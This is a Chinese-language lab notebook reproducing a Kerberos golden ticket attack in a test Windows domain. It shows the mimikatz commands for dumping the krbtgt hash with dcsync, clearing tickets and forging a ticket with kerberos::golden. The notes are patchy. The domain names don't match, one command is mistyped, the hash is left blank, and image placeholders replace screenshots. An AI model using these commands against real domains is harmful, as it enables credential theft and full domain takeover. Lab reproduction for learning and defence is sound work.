实验环境以及工具
服务器:Windows server 2003
用户:Windows 7旗舰版
工具:mimikatz
搭建服务器环境
参考:内网横向——域渗透之黄金票据复现-CSDN博客
创建用户
使用gpupdate刷新策略;
搭建win7环境
设置ip
‘
黄金票攻击复现
这里直接在域控制权上进行操作
whoami /user 获取域的sid值(去掉最后的-500,500表示为administrator用户)
net config workstation 查看所处域
获取域的KRBTGT账户NTLM密码哈希或者aes-256值
用mimikatz
lsadump::dcsync /domain:aabb.com /user:krbtgt /csv
客户端打开mimikatz,首先清除之前的票据,依次输入指令
kerberos::purge
kerberos::list
dir \\aabb-bca237.aabb.com\c$
进行黄金票据的制作。指令格式为:
kerberos::golden /user:普通域用户 /domain:域 /sid:域的SID /krbtgt:krbtgt的NTLM_Hash /ticket:名字.kirbi
则生成黄金票据的指令为:
kerberos:golden /user:zhaoerhe /domain:ytdd.com /sid:S-1-5-21-1206714925-2034148990-4264453829 /krbtgt: /ticket:aabb.kirbi
参考:
3. mimikatz
kerberos::golden
mimikatz的kerberos::golden模块可以用于制作黄金票据,票据格式是.kirbi
首先获取krbtgt的hash
image-20191012175213102
获取域的sid
image-20191104153401060
制作黄金票据